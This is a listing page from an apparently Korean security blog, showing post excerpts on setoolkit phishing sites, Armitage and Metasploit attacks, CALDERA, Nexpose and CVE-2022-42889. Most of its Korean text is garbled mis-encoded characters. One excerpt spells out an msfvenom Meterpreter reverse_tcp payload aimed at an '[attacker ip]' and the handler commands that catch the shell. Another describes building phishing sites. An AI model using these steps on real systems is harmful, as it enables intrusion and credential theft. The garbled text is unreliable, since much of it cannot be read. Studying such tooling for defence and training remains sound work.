๐’ƒ๐’†๐’‚๐’–๐’•๐’š ๐’Š๐’๐’•๐’†๐’๐’๐’Š๐’ˆ๐’†๐’๐’•
728x90
๋ฐ˜์‘ํ˜•
article thumbnail
kali setoolkit์„ ์ด์šฉํ•œ ํ”ผ์‹ฑ ์‚ฌ์ดํŠธ ๋งŒ๋“ค๊ธฐ
Metasploit/Kali & Backtrack 2023. 9. 8. 16:29

ํ•ด๋‹น ๋ธ”๋กœ๊ทธ๋Š” ํ•ดํ‚น ๋ฐ ๋ณด์•ˆ ๋ธ”๋กœ๊ทธ๋กœ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ ์ž‘์„ฑ๋˜์–ด์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์•„๋ž˜์˜ ๋‚ด์šฉ์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•ดํ‚น ์‹œ๋„ ๋ฐ ์‹ค์ œ ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•˜์—ฌ ์ผ์–ด๋‚˜๋Š” ๋ชจ๋“  ์ฑ…์ž„์€ ๋ณธ์ธ(๋”ฐ๋ผํ•œ์ž)์—๊ฒŒ ์žˆ์Œ์„ ์•Œ๋ ค๋“œ๋ฆฌ๋ฉฐ, ๊ธ€์“ด์ด๋Š” ์•„๋ฌด๋Ÿฐ ์ฑ…์ž„์„ ์ง€์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ๊ผญ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ๋งŒ ์‚ฌ์šฉํ•˜์—ฌ ์ฃผ์‹œ๊ธธ ๋ฐ”๋ž๋‹ˆ๋‹ค. ๊ฐ์‚ฌํ•ฉ๋‹ˆ๋‹ค. kali๋ฅผ ์‚ฌ์šฉํ•˜๋‹ค ๋ณด๋ฉด ํ”ผ์‹ฑ์‚ฌ์ดํŠธ๋ฅผ ๋งŒ๋“ค๊ฑฐ๋‚˜ ํ…Œ์ŠคํŠธ ์šฉ์œผ๋กœ ๊ฐ€์งœ ์‚ฌ์ดํŠธ๋ฅผ ๋งŒ๋“ค์–ด์•ผ ํ•˜๋Š” ๊ฒฝ์šฐ๊ฐ€ ์žˆ๋‹ค. ์ด๋•Œ ์ฃผ๋กœ ์‚ฌ์šฉํ•˜๋Š” ๋„๊ตฌ๊ฐ€ setoolkit ์ด๋ผ๋Š” ๋„๊ตฌ์ธ๋ฐ ํ”ผ์‹ฑ ์‚ฌ์ดํŠธ๋ฅผ ๋งŒ๋“œ๋Š” ๊ฒƒ ๋ฟ์•„๋‹Œ ์ŠคํŒธ๋ฉ”์ผ ๋“ฑ ์‚ฌํšŒ๊ณตํ•™ ๊ธฐ๋ฒ•์—์„œ ์‚ฌ์šฉํ•˜๋Š” ๊ณต๊ฒฉ๊ธฐ๋ฒ•๋“ค์ด ๋‹ค์–‘ํ•˜๊ฒŒ ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋‹ค. setoolkit์„ ์‚ฌ์šฉํ•˜๊ธฐ ์œ„ํ•ด์„  ๋จผ์ € msfdb์™€ postgresql์„ ์‹คํ–‰ ํ•ด์•ผํ•œ๋‹ค. sudo service postgresql..

๋ชจ์˜ํ•ดํ‚น์„ ํ•ด๋ณด์ž! -armitage 2ํŽธ
Metasploit/Kali & Backtrack 2023. 8. 21. 19:56

ํ•ด๋‹น ๋ธ”๋กœ๊ทธ๋Š” ํ•ดํ‚น ๋ฐ ๋ณด์•ˆ ๋ธ”๋กœ๊ทธ๋กœ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ ์ž‘์„ฑ๋˜์–ด์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์•„๋ž˜์˜ ๋‚ด์šฉ์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•ดํ‚น ์‹œ๋„ ๋ฐ ์‹ค์ œ ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•˜์—ฌ ์ผ์–ด๋‚˜๋Š” ๋ชจ๋“  ์ฑ…์ž„์€ ๋ณธ์ธ(๋”ฐ๋ผํ•œ์ž)์—๊ฒŒ ์žˆ์Œ์„ ์•Œ๋ ค๋“œ๋ฆฌ๋ฉฐ, ๊ธ€์“ด์ด๋Š” ์•„๋ฌด๋Ÿฐ ์ฑ…์ž„์„ ์ง€์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ๊ผญ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ๋งŒ ์‚ฌ์šฉํ•˜์—ฌ ์ฃผ์‹œ๊ธธ ๋ฐ”๋ž๋‹ˆ๋‹ค. ๊ฐ์‚ฌํ•ฉ๋‹ˆ๋‹ค. 2023.08.18 - [Metasploit/Kali & Backtrack] - ๋ชจ์˜ํ•ดํ‚น์„ ํ•ด๋ณด์ž!-armitageํŽธ ๋ชจ์˜ํ•ดํ‚น์„ ํ•ด๋ณด์ž!-armitageํŽธ ํ•ด๋‹น ๋ธ”๋กœ๊ทธ๋Š” ํ•ดํ‚น ๋ฐ ๋ณด์•ˆ ๋ธ”๋กœ๊ทธ๋กœ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ ์ž‘์„ฑ๋˜์–ด์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์•„๋ž˜์˜ ๋‚ด์šฉ์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•ดํ‚น ์‹œ๋„ ๋ฐ ์‹ค์ œ ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•˜์—ฌ ์ผ์–ด๋‚˜๋Š” ๋ชจ๋“  ์ฑ…์ž„์€ ๋ณธ์ธ(๋”ฐ๋ผํ•œ์ž)์—๊ฒŒ ์žˆ์Œ blog.z3alous.xyz ๋ช‡์ผ ์ „์— ์œ„์˜ ๊ธ€์„ ์ž‘์„ฑํ•˜์˜€๋‹ค. ์ด..

article thumbnail
๋ชจ์˜ํ•ดํ‚น์„ ํ•ด๋ณด์ž!-armitageํŽธ
Metasploit/Kali & Backtrack 2023. 8. 18. 22:41

ํ•ด๋‹น ๋ธ”๋กœ๊ทธ๋Š” ํ•ดํ‚น ๋ฐ ๋ณด์•ˆ ๋ธ”๋กœ๊ทธ๋กœ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ ์ž‘์„ฑ๋˜์–ด์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์•„๋ž˜์˜ ๋‚ด์šฉ์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•ดํ‚น ์‹œ๋„ ๋ฐ ์‹ค์ œ ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•˜์—ฌ ์ผ์–ด๋‚˜๋Š” ๋ชจ๋“  ์ฑ…์ž„์€ ๋ณธ์ธ(๋”ฐ๋ผํ•œ์ž)์—๊ฒŒ ์žˆ์Œ์„ ์•Œ๋ ค๋“œ๋ฆฌ๋ฉฐ, ๊ธ€์“ด์ด๋Š” ์•„๋ฌด๋Ÿฐ ์ฑ…์ž„์„ ์ง€์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ๊ผญ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ๋งŒ ์‚ฌ์šฉํ•˜์—ฌ ์ฃผ์‹œ๊ธธ ๋ฐ”๋ž๋‹ˆ๋‹ค. ๊ฐ์‚ฌํ•ฉ๋‹ˆ๋‹ค. ์•ฝ 1๋‹ฌ ์ „์ฏค toss์—์„œ ๋งŒ๋“ค์–ด์ง„ ์˜์ƒ์„ ๋ณด์•˜๋‹ค. ํ•ด๋‹น์˜์ƒ์ด๋‹ค. https://youtu.be/tAqgvP07RnQ ํ•ด๋‹น ์˜์ƒ์„ ๋ณด๋Š”๋™์•ˆ ์‹œ๊ฐ„ ๊ฐ€๋Š”์ค„ ๋ชจ๋ฅด๊ณ  ๊ณ„์† ๋ณด๊ณ ์žˆ์—ˆ๋‹ค. ํ•ด๋‹น ๋™์˜์ƒ์— ๋‚˜์˜ค๋Š” ๋ถ„๋“ค์„ ์‹ค์ œ๋กœ ์•„๋Š” ๋ถ„๋“ค์ด์ง€๋งŒ ์ด๋ ‡๊ฒŒ ๋ณด๋‹ˆ ๋”๋”์šฑ ๋ฉ‹์žˆ์–ด ๋ณด์˜€๋‹ค. 'ํ† ์Šค๋ฅผ ํ•ดํ‚นํ•˜๋Š” ์ž' ๋ผ๋Š” ์˜์ƒ์„ ๋ณด๊ณ  ์—ฌ๋Ÿฌ๊ฐ€์ง€์— ํฅ๋ฏธ๋ฅผ ๊ฐ€์กŒ๋‹ค. forensic์„ ์ฃผ๋กœ ํ•˜๋˜ ๋‚˜์˜€๋Š”๋ฐ ์—…๋ฌด๋ฅผ ํ•˜๋ฉด์„œ ์กฐ๊ธˆ์”ฉ ์ทจ์•ฝ์ ๊ณผ ๋ชจ์˜ํ•ดํ‚น..

article thumbnail
CALDERA๋ฅผ ํ†ตํ•œ ์‹œ๋‚˜๋ฆฌ์˜ค ์นจํˆฌ ํ…Œ์ŠคํŠธ(์—์ด์ „ํŠธ์„ค์น˜)
Metasploit/MiTRE ATT&CK 2022. 11. 17. 21:46

ํ•ด๋‹น ๋ธ”๋กœ๊ทธ๋Š” ํ•ดํ‚น ๋ฐ ๋ณด์•ˆ ๋ธ”๋กœ๊ทธ๋กœ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ ์ž‘์„ฑ๋˜์–ด์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์•„๋ž˜์˜ ๋‚ด์šฉ์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•ดํ‚น ์‹œ๋„ ๋ฐ ์‹ค์ œ ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•˜์—ฌ ์ผ์–ด๋‚˜๋Š” ๋ชจ๋“  ์ฑ…์ž„์€ ๋ณธ์ธ(๋”ฐ๋ผํ•œ์ž)์—๊ฒŒ ์žˆ์Œ์„ ์•Œ๋ ค๋“œ๋ฆฌ๋ฉฐ, ๊ธ€์“ด์ด๋Š” ์•„๋ฌด๋Ÿฐ ์ฑ…์ž„์„ ์ง€์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ๊ผญ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ๋งŒ ์‚ฌ์šฉํ•˜์—ฌ ์ฃผ์‹œ๊ธธ ๋ฐ”๋ž๋‹ˆ๋‹ค. ๊ฐ์‚ฌํ•ฉ๋‹ˆ๋‹ค. ์ €๋ฒˆ์— ํฌ์ŠคํŒ…์€ caldera๋ฅผ ์„ค์น˜ํ•˜๋Š” ๋ฐฉ๋ฒ•์— ๋Œ€ํ•ด ์ž‘์„ฑํ•ด๋ณด์•˜๋‹ค. 2022.10.27 - [Metasploit/MiTRE ATT&CK] - MITRE ATT&CK ์‚ฌ์ด๋ฒ„ ๋ชจ์˜ ๊ณต๊ฒฉ ๋„๊ตฌ ์ด๋ก ๊ณผ ์‹ค๋ฌด ๋„์„œ ํ›„๊ธฐ 1 MITRE ATT&CK ์‚ฌ์ด๋ฒ„ ๋ชจ์˜ ๊ณต๊ฒฉ ๋„๊ตฌ ์ด๋ก ๊ณผ ์‹ค๋ฌด ๋„์„œ ํ›„๊ธฐ 1 ๋ฐ•์›ํ˜• ๊ต์ˆ˜๋‹˜๊ป˜ ์ฑ…์„ ์„ ๋ฌผ๋ฐ›์€ ํ›„ ์กฐ๊ธˆ์”ฉ ์ฝ์–ด๋ณด์•˜๋‹ค. MITRE ATT&CK(์ดํ•˜ ๋งˆ์ดํ„ฐ)์ด๋ž€ ๋‹จ์ฒด๋Š” ํ•ดํ‚น๊ด€๋ จ ์—…๋ฌด ๋ฐ ..

Nexpose ๊ถ๊ธˆ์ฆ์ด ํ’€๋ฆฌ๋Š” ์ˆœ๊ฐ„
Metasploit/Vulnerability 2022. 11. 11. 18:40

ํ•ด๋‹น ๋ธ”๋กœ๊ทธ๋Š” ํ•ดํ‚น ๋ฐ ๋ณด์•ˆ ๋ธ”๋กœ๊ทธ๋กœ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ ์ž‘์„ฑ๋˜์–ด์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์•„๋ž˜์˜ ๋‚ด์šฉ์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•ดํ‚น ์‹œ๋„ ๋ฐ ์‹ค์ œ ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•˜์—ฌ ์ผ์–ด๋‚˜๋Š” ๋ชจ๋“  ์ฑ…์ž„์€ ๋ณธ์ธ(๋”ฐ๋ผํ•œ์ž)์—๊ฒŒ ์žˆ์Œ์„ ์•Œ๋ ค๋“œ๋ฆฌ๋ฉฐ, ๊ธ€์“ด์ด๋Š” ์•„๋ฌด๋Ÿฐ ์ฑ…์ž„์„ ์ง€์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ๊ผญ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ๋งŒ ์‚ฌ์šฉํ•˜์—ฌ ์ฃผ์‹œ๊ธธ ๋ฐ”๋ž๋‹ˆ๋‹ค. ๊ฐ์‚ฌํ•ฉ๋‹ˆ๋‹ค. ๋ช‡์ผ์ „์— ์ด๋Ÿฌํ•œ ๊ธ€์„ ์˜ฌ๋ฆฐ์ ์ด ์žˆ๋‹ค. 2022.11.06 - [Metasploit/Vulnerability] - Nexpose๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด์„œ ์˜๋ฌธ์ธ์ ? Nexpose๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด์„œ ์˜๋ฌธ์ธ์ ? ํ•ด๋‹น ๋ธ”๋กœ๊ทธ๋Š” ํ•ดํ‚น ๋ฐ ๋ณด์•ˆ ๋ธ”๋กœ๊ทธ๋กœ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ ์ž‘์„ฑ๋˜์–ด์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์•„๋ž˜์˜ ๋‚ด์šฉ์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•ดํ‚น ์‹œ๋„ ๋ฐ ์‹ค์ œ ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•˜์—ฌ ์ผ์–ด๋‚˜๋Š” ๋ชจ๋“  ์ฑ…์ž„์€ ๋ณธ์ธ(๋”ฐ๋ผํ•œ์ž)์—๊ฒŒ ์žˆ์Œ blog.z3alous.xyz ์ด๊ฒŒ..

Nexpose๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด์„œ ์˜๋ฌธ์ธ์ ?
Metasploit/Vulnerability 2022. 11. 6. 22:47

ํ•ด๋‹น ๋ธ”๋กœ๊ทธ๋Š” ํ•ดํ‚น ๋ฐ ๋ณด์•ˆ ๋ธ”๋กœ๊ทธ๋กœ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ ์ž‘์„ฑ๋˜์–ด์ง€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์•„๋ž˜์˜ ๋‚ด์šฉ์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•ดํ‚น ์‹œ๋„ ๋ฐ ์‹ค์ œ ๊ณต๊ฒฉ์„ ์‹œ๋„ํ•˜์—ฌ ์ผ์–ด๋‚˜๋Š” ๋ชจ๋“  ์ฑ…์ž„์€ ๋ณธ์ธ(๋”ฐ๋ผํ•œ์ž)์—๊ฒŒ ์žˆ์Œ์„ ์•Œ๋ ค๋“œ๋ฆฌ๋ฉฐ, ๊ธ€์“ด์ด๋Š” ์•„๋ฌด๋Ÿฐ ์ฑ…์ž„์„ ์ง€์ง€ ์•Š์Šต๋‹ˆ๋‹ค. ๊ผญ ๊ณต๋ถ€ ๋ฐ ์—ฐ๊ตฌ์šฉ์œผ๋กœ๋งŒ ์‚ฌ์šฉํ•˜์—ฌ ์ฃผ์‹œ๊ธธ ๋ฐ”๋ž๋‹ˆ๋‹ค. ๊ฐ์‚ฌํ•ฉ๋‹ˆ๋‹ค. ์ตœ๊ทผ์— ์—…๋ฌด๋•Œ๋ฌธ์— ์Šค์บ๋„ˆ๋ฅผ ์‚ฌ์šฉํ•ด์•ผํ•˜๋Š” ์ผ์ด ์žˆ์—ˆ๋‹ค. ๊ธฐ์กด์— ์›น์Šค์บ๋„ˆ ๋“ฑ์€ ๋งŽ์ด ์‚ฌ์šฉํ•ด๋ณด์•˜์ง€๋งŒ ์‹œ์Šคํ…œ ์Šค์บ๋„ˆ ๋ฐ CVE ์Šค์บ๋„ˆ๋Š” ์ž˜ ์‚ฌ์šฉํ•ด๋ณด์ง€ ์•Š์•˜๋‹ค. ๊ทธ๋ž˜์„œ ์ด ์ฐธ์— ์จ๋ณด์•„์•ผํ•ด์„œ ์จ๋ณด์•˜๋Š”๋ฐ... ์ด 3๊ฐœ๋ฅผ ์จ๋ณด์•˜๋‹ค. openvas(GVM) nexpose nessus ์ด๋ ‡๊ฒŒ 3๊ฐœ๋ฅผ ์‚ฌ์šฉํ–ˆ๋Š”๋ฐ.. nexpose๋ฅผ ์‚ฌ์šฉํ•˜๋ฉด์„œ ๊ถ๊ธˆํ•œ ์ ์ด ์ƒ๊ฒผ๋‹ค. ์ผ๋‹จ ํ™˜๊ฒฝ์€ ์•„๋ž˜์™€ ๊ฐ™์ด ๊ตฌ์„ฑํ•˜์—ฌ ํ…Œ์ŠคํŠธ๋ฅผ ํ•˜์˜€๋‹ค. victim..

article thumbnail
MITRE ATT&CK ์‚ฌ์ด๋ฒ„ ๋ชจ์˜ ๊ณต๊ฒฉ ๋„๊ตฌ ์ด๋ก ๊ณผ ์‹ค๋ฌด ๋„์„œ ํ›„๊ธฐ 1
Metasploit/MiTRE ATT&CK 2022. 10. 27. 21:40

๋ฐ•์›ํ˜• ๊ต์ˆ˜๋‹˜๊ป˜ ์ฑ…์„ ์„ ๋ฌผ๋ฐ›์€ ํ›„ ์กฐ๊ธˆ์”ฉ ์ฝ์–ด๋ณด์•˜๋‹ค. MITRE ATT&CK(์ดํ•˜ ๋งˆ์ดํ„ฐ)์ด๋ž€ ๋‹จ์ฒด๋Š” ํ•ดํ‚น๊ด€๋ จ ์—…๋ฌด ๋ฐ ๊ณต๋ถ€๋ฅผ ํ•˜๋Š” ์‚ฌ๋žŒ๋“ค ์‚ฌ์ด์—์„œ๋Š” ์œ ๋ช…ํ•œ ๋‹จ์ฒด์ด๋‹ค. ์ •๋ณด์ˆ˜์ง‘์„ ์‹œ์ž‘์œผ๋กœ ํ•˜์—ฌ ์ง€์†์„ฑ์„ ์œ ์ง€ํ•˜๋Š” ๋“ฑ์˜ ๊ธฐ์ˆ ๋“ค์„ ๋‚˜์—ดํ•˜๊ณ  ํ•ด๋‹น ๊ธฐ์ˆ ๋“ค์— ๋Œ€ํ•œ ์„ค๋ช… ๋“ฑ ์‰ฝ๊ฒŒ ๋งํ•ด ํ•ดํ‚น์ด ์ด๋ฃจ์–ด์ง€๋Š” ์ˆœ์„œ์™€ ํ•ดํ‚น๋‹จ์ฒด๋“ค์˜ ๊ณต๊ฒฉ ๊ธฐ๋ฒ• ๋“ฑ์„ ๋‹ค๋ฃจ๋Š” ๋‹จ์ฒด์ด๋‹ค. ๊ณต์‹ ํ™ˆํŽ˜์ด์ง€๋Š” https://attack.mitre.org/ ์ด๋‹ค. ์‚ฌ์ด๋ฒ„ ๋ชจ์˜ ๊ณต๊ฒฉ ๋„๊ตฌ ์ด๋ก ๊ณผ ์‹ค๋ฌด(์ดํ•˜ ์ฑ…์ด๋ผ๊ณ  ์นญํ•จ)๋Š” ๋งˆ์ดํ„ฐ์—์„œ ์ž‘์„ฑ๋˜์–ด ์žˆ๋Š” ๊ธฐ์ˆ ๋“ค์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•˜์—ฌ ์‹œ๋‚˜๋ฆฌ์˜ค ๊ธฐ๋ฐ˜์˜ ๋ชจ์˜ํ›ˆ๋ จ ๋ฐ ๊ณต๊ฒฉ์ด ๊ฐ€๋Šฅํ•œ Caldara์— ๋Œ€ํ•˜์—ฌ ๋‹ค๋ฃฌ๋‹ค. ํ˜„์žฌ ํด๋ผ์šฐ๋“œ(Cloud)์˜ ์‚ฌ์šฉ์ด ์ฆ๊ฐ€ํ•จ์— ๋”ฐ๋ผ ๋งŽ์€ ํ•ดํ‚น ๊ณต๊ฒฉ๋“ค์ด ์ผ์–ด๋‚˜๊ณ  ์žˆ๋‹ค. ์ด์— ๊ฐ์ข… ์นจํ•ด์‚ฌ๊ณ ๋“ค์ด ์ผ์–ด๋‚˜..

article thumbnail
Apache Commons Text RCE(CVE-2022-42889 ์ทจ์•ฝ์  )
Metasploit/Vulnerability 2022. 10. 24. 22:58

ํ•ด๋‹น ๊ธ€์€ ํ•ดํ‚น๋‚ด์šฉ์„ ํฌํ•จํ•˜๊ณ  ์žˆ์œผ๋ฉฐ, ๊ณต๋ถ€์šฉ์œผ๋กœ ์ž‘์„ฑ๋œ ๊ฒƒ์ž…๋‹ˆ๋‹ค. ํ•ด๋‹น ๋‚ด์šฉ์„ ๊ธฐ๋ฐ˜์œผ๋กœ ํ•ดํ‚น์„ ์‹œ๋„ํ•˜๊ฑฐ๋‚˜ ์ทจ์•ฝ์ ์„ ์•…์šฉํ•  ๊ฒฝ์šฐ ๋ชจ๋“  ํ–‰์œ„์— ๋Œ€ํ•œ ์ฑ…์ž„์€ ์•…์šฉํ•œ ์‚ฌ๋žŒ(์‚ฌ์šฉ์ž)์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค. ์•…์šฉํ•˜์ง€๋งˆ์„ธ์š”! ์ตœ๊ทผ์— Apache Commons Text๋ผ๋Š” ๋ผ์ด๋ธŒ๋Ÿฌ๋ฆฌ์—์„œ ์›๊ฒฉ์ฝ”๋“œ์‹คํ–‰ ์ทจ์•ฝ์ ์ด ๋ฐœ๊ฒฌ๋˜์–ด์„œ ํŒจ์น˜๊ฐ€ ๋˜์—ˆ๋‹ค. ์ทจ์•ฝ๋ฒ„์ „์€ commons text 1.5 ~ 1.9๋ผ๊ณ  ๋ฐœํ‘œ๋˜์—ˆ๋‹ค. ํŒจ์น˜๋Š” 1.10์—์„œ ์ด๋ฃจ์–ด์กŒ๋‹ค. NVD์˜ ๋‚ด์šฉ์˜ ์›๋ฌธ์„ ํ™•์ธํ•ด๋ณด๋ฉด Apache Commons Text performs variable interpolation, allowing properties to be dynamically evaluated and expanded. The standard format for interpol..

article thumbnail
[์ฑ…์†Œ๊ฐœ] MITRE & ATT&CK ์‚ฌ์ด๋ฒ„ ๋ชจ์˜ ๊ณต๊ฒฉ ๋„๊ตฌ ์ด๋ก ๊ณผ ์‹ค๋ฌด ์ฑ…์„ ๋ฌผ
Metasploit/MiTRE ATT&CK 2022. 10. 21. 22:28

์ •๋ง ์˜ค๋žœ๋งŒ์— ๊ธ€์„ ์ž‘์„ฑํ•˜๋„ค์š”!!! ์ด์   ์ •๋ง์ •๋ง ๋ธ”๋กœ๊ทธ๋ฅผ ์ž‘์„ฑ์„ ์œ ์ง€ํ•˜๋Š” ๊ฒƒ์„ ๋„์ „ํ•ด๋ด์•ผ๊ฒ ์Šต๋‹ˆ๋‹ค. ์ œ๊ฐ€ ์ด๋ ‡๊ฒŒ ์˜ค๋žœ๋งŒ์— ๊ธ€์„ ์“ฐ๋Š” ์ด์œ ๋Š”!!!!! ใ…‚ฮ“๋กœใ…‚ฮ“๋กœ ์ฑ…์†Œ๊ฐœ๋ฅผ ํ•˜๊ธฐ์œ„ํ•ด์„œ์ธ๋ฐ์š”!! ์ฑ… ์ œ๋ชฉ์€ 'MITRE & ATT&CK ์‚ฌ์ด๋ฒ„ ๋ชจ์˜ ๊ณต๊ฒฉ ๋„๊ตฌ ์ด๋ก ๊ณผ ์‹ค๋ฌด' ๋ผ๋Š” ์ฑ…์ž…๋‹ˆ๋‹ค. ์ž๋ž‘์•„๋‹Œ ์ž๋ž‘์„ ํ•ด๋ณด์ž๋ฉด ์‚ฌ์‹ค ์ฑ… ์ €์ž์ด์‹  ๋ฐ•์›ํ˜• ๊ต์ˆ˜๋‹˜๊ป˜ ์ฑ…์„ ์„ ๋ฌผ ๋ฐ›์•˜์–ด์š”! ์ œ๊ฐ€ CERTํŒ€์—์„œ ๊ทผ๋ฌด๋ฅผ ํ•˜๋‹ค๋ณด๋‹ˆ MITRE ATT&CK ๊ด€๋ จ ์—…๋ฌด๋„ ์ง„ํ–‰์„ ํ•˜๊ณ ์žˆ๋Š”๋ฐ ๋งˆ๋•…ํžˆ ์ฐธ๊ณ ํ•˜๊ฑฐ๋‚˜ ํ• ๋งŒํ•œ ์ฑ…๋“ค์ด ์—†์—ˆ๊ฑฐ๋“ ์š”? ๊ทผ๋ฐ ์ด๊ฒŒ ๋ญ๋žŒ??? ํ•˜๋Š˜์—์„œ ์ €์˜ ๋งˆ์Œ์„ ๋“ค์—ˆ๋Š”์ง€ ๋˜ญ!! ์ด๋ ‡๊ฒŒ ์ข‹์€ ์ฑ…์„ ์ถœํŒํ•ด์ฃผ์…จ๋‹จ ๋ง์ด์ฃ ? ์ฑ… ํ‘œ์ง€๋ถ€ํ„ฐ ๋ญ”๊ฐ€ ๋Š๋‚Œ์žˆ์ง€์•Š์Šต๋‹ˆ๊นŒ? ์ €๋Š” ํ–‰๋ณตํ•˜์„ธ์š”๋ผ๋Š” ๋‹จ์–ด๋ฅผ ์—„์ฒญ ๋ฒ ๋ฆฌ๋ฒ ๋ฆฌ ์ข‹์•„ํ•œ๋‹จ๋ง์ด์˜ˆ์š”? ๊ทธ๋Ÿฐ ์ €๋ฅผ ์œ„ํ•ด ๋˜ ์ด..

article thumbnail
Brutal – Toolkit to quickly create various payloads,powershell and virus attacks
Metasploit 2016. 12. 28. 01:09

Brutal โ€“ Toolkit to quickly create various payloads,powershell and virus attacksBrutal - ๋น ๋ฅด๊ณ  ๋‹ค์–‘ํ•œ payloads, ํŒŒ์›Œ์…ธ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๊ณต๊ฒฉ์„ ์œ„ํ•œ ํˆดํ‚ท https://github.com/screetsec/brutal

article thumbnail
Hack windows XP with armitage in kali
Metasploit 2016. 12. 23. 22:54

๋ชจ๋“  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž ๋ณธ์ธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค. ๋จผ์ € service apache2 start ๋ฅผ ์‹คํ–‰ํ•ด์ค€๋‹ค. ๋‹ค์Œ์€ service postgresql start ๋ช…๋ น์–ด๋ฅผ ์‹คํ–‰์‹œํ‚จ ํ›„ service metasploit start ๋ฅผ ์‹คํ–‰ํ•ด์ค€๋‹ค. ๋‹ค์Œ์€ armitage๋ฅผ ์‹คํ–‰์‹œํ‚จ๋‹ค. ์ด๋Ÿฌํ•œ ์ฐฝ์„ ๋ณผ์ˆ˜์žˆ์„ ํ…๋ฐ connect๋ฅผ ๋ˆ„๋ฅด๊ณ  yes๋ฅผ ๋ˆ„๋ฅด๊ณ  ๊ธฐ๋‹ค๋ฆฌ๋ฉด ์Œ~~ ์Œ~~~ ๊ธฐ๋‹ค๋ฆฌ๋ฉด ์ด๋Ÿฌํ•œ ์ฐฝ์ด ๋œฌ๋‹ค. tab์ฐฝ์—์„œ hosts -> add hosts ๋ฅผ ๋ˆ„๋ฅด๋ฉด ์ด๋ ‡๊ฒŒ victim IP๋ฅผ ์ž…๋ ฅํ•  ์ˆ˜์žˆ๋„๋ก ๋œฌ๋‹ค. ๋“ฑ๋กํ›„ OS ๋ฅผ ์•Œ์•„๋ณด์ž ๋‹ค์‹œ host ํƒญ์—์„œ nmap scan -> quick scan(os detect)๋ฅผ ํด๋ฆญํ•˜๊ณ  yes ๊ทธ๋Ÿผ ์ฝ˜์†”์ฐฝ์— ์ด๋Ÿฌํ•œ ๊ฒƒ์„ ํ™•์ธํ• ์ˆ˜ ์žˆ๋‹ค. ์ด์ œ ์ทจ์•ฝ์ ์„ ์ด์šฉํ•˜์—ฌ ๊ณต๊ฒฉํ•˜๊ธฐ ์œ„ํ•ด ์–ด๋– ํ•œ..

article thumbnail
Kali Linux by pass - Hack Windows metasploit tutorial
Metasploit 2016. 12. 22. 18:48

๋ชจ๋“  ์ฑ…์ž„์€ ์‚ฌ์šฉ์ž ๋ณธ์ธ์—๊ฒŒ ์žˆ์Šต๋‹ˆ๋‹ค. ๋จผ์ € service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[์›ํ•˜๋Š” ํฌํŠธ] -f exe > filename.exe ๊ทธ๋Ÿผ /root ํด๋”์— exeํŒŒ์ผ์ด ์ƒ๊ธด๊ฒƒ์„ ํ™•์ธํ• ์ˆ˜ ์žˆ๋‹ค.๊ทธ๋Ÿผ ๋‹ค์Œ์œผ๋กœ๋Š” ์ปจํŠธ๋กคํ•  ํ•ธ๋“ค๋Ÿฌ๋ฅผ ๋งŒ๋“ค์–ด๋ณด์ž. ๋จผ์ € msfconsole์„ ์ž…๋ ฅํ•œ๋‹ค. use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [์šฐ๋ฆฌ๊ฐ€ ํŒŒ์ผ์„ ๋งŒ๋“ค๋•Œ ์‚ฌ์šฉํ•œ payload]set LHOST [attacker ip]set LP..

728x90
